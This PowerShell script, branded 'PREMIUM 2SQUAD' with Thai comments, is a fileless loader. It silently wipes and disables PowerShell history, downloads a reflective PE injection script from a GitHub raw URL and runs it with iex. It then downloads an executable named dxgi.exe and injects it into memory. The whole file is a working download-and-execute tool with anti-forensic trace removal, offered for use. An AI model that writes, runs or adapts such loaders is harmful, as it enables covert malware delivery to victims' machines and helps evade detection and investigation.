# =========================================================================
# PREMIUM 2SQUAD - FILELESS EXE LOADER (NATIVE C++)
# =========================================================================
$ErrorActionPreference = "SilentlyContinue"
$host.UI.RawUI.WindowTitle = "PREMIUM 2SQUAD - LOADER"
Clear-Host

Write-Host ""
Write-Host "        ___  ___  ___  _  __ __  _____  __  __ __ " -ForegroundColor Cyan
Write-Host "       / _ \/ _ \/ __// |/ // / / /   |/ / / // / " -ForegroundColor Cyan
Write-Host "      / ___/ , _/ _/ /    // /_/ / /| / /_/ // /_ " -ForegroundColor Cyan
Write-Host "     /_/  /_/|_/___//_/|_/ \____/_/ |_/____//___/ " -ForegroundColor Cyan
Write-Host "  ========================================================" -ForegroundColor DarkGray
Write-Host "          P R E M I U M   2 S Q U A D   L O A D E R" -ForegroundColor White
Write-Host "  ========================================================" -ForegroundColor DarkGray
Write-Host ""

# ==========================================
# AUTO HISTORY CLEANUP (ลบประวัติอัตโนมัติแบบเงียบๆ)
# ==========================================
Write-Host "  " -NoNewline; Write-Host "[" -ForegroundColor DarkGray -NoNewline; Write-Host "*" -ForegroundColor Yellow -NoNewline; Write-Host "]" -ForegroundColor DarkGray -NoNewline; Write-Host " Wiping PowerShell history traces..." -ForegroundColor White

$historyPath = (Get-PSReadLineOption).HistorySavePath
if (Test-Path $historyPath) {
    # 1. เคลียร์ข้อความในไฟล์ประวัติทิ้งให้เป็นหน้าขาว
    Clear-Content -Path $historyPath -Force -ErrorAction SilentlyContinue
    # 2. ลบประวัติการพิมพ์ในหน้าต่างปัจจุบัน
    Clear-History
    # 3. บังคับไม่ให้ PowerShell เซฟคำสั่ง iex ของเราลงไปใหม่ตอนปิดโปรแกรม
    Set-PSReadLineOption -HistorySaveStyle SaveNothing
    
    Start-Sleep -Milliseconds 500
    Write-Host "  " -NoNewline; Write-Host "[" -ForegroundColor DarkGray -NoNewline; Write-Host "+" -ForegroundColor Green -NoNewline; Write-Host "]" -ForegroundColor DarkGray -NoNewline; Write-Host " History wiped perfectly. No trace left." -ForegroundColor Green
}
Write-Host ""

# ==========================================
# FILELESS DOWNLOAD & EXECUTION (REFLECTIVE PE)
# ==========================================
Write-Host "  " -NoNewline; Write-Host "[" -ForegroundColor DarkGray -NoNewline; Write-Host "*" -ForegroundColor Yellow -NoNewline; Write-Host "]" -ForegroundColor DarkGray -NoNewline; Write-Host " Connecting to secure server..." -ForegroundColor White

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

try {
    # 1. โหลดเครื่องมือ Reflective PE Injection
    $InjectorURL = "https://raw.githubusercontent.com/Vegusnerver/2squad/refs/heads/main/2squad.txt"
    iex (New-Object Net.WebClient).DownloadString($InjectorURL)

    # 2. ⚠️ ใส่ลิ้งก์ Raw ของไฟล์ .exe ของคุณบน GitHub ตรงนี้ ⚠️
    $ExeURL = "https://raw.githubusercontent.com/Vegusnerver/2squad/main/dxgi.exe"
    
    $WebClient = New-Object System.Net.WebClient
    $ExeBytes = $WebClient.DownloadData($ExeURL)
    
    Write-Host "  " -NoNewline; Write-Host "[" -ForegroundColor DarkGray -NoNewline; Write-Host "+" -ForegroundColor Green -NoNewline; Write-Host "]" -ForegroundColor DarkGray -NoNewline; Write-Host " Payload ready ($($ExeBytes.Length) bytes)." -ForegroundColor Green
    Write-Host "  " -NoNewline; Write-Host "[" -ForegroundColor DarkGray -NoNewline; Write-Host "*" -ForegroundColor Yellow -NoNewline; Write-Host "]" -ForegroundColor DarkGray -NoNewline; Write-Host " Executing C++ Native Payload in memory..." -ForegroundColor White
    
    Start-Sleep -Seconds 2
    
    # 3. สั่งรัน EXE เข้าไปใน Memory โดยตรง
    Invoke-ReflectivePEInjection -PEBytes $ExeBytes -ForceASLR
    
} catch {
    Write-Host "`n  [!] Execution Failed: $($_.Exception.Message)" -ForegroundColor Red
    Write-Host "  [!] Make sure your C++ executable is compiled as 64-bit (x64)." -ForegroundColor Red
}
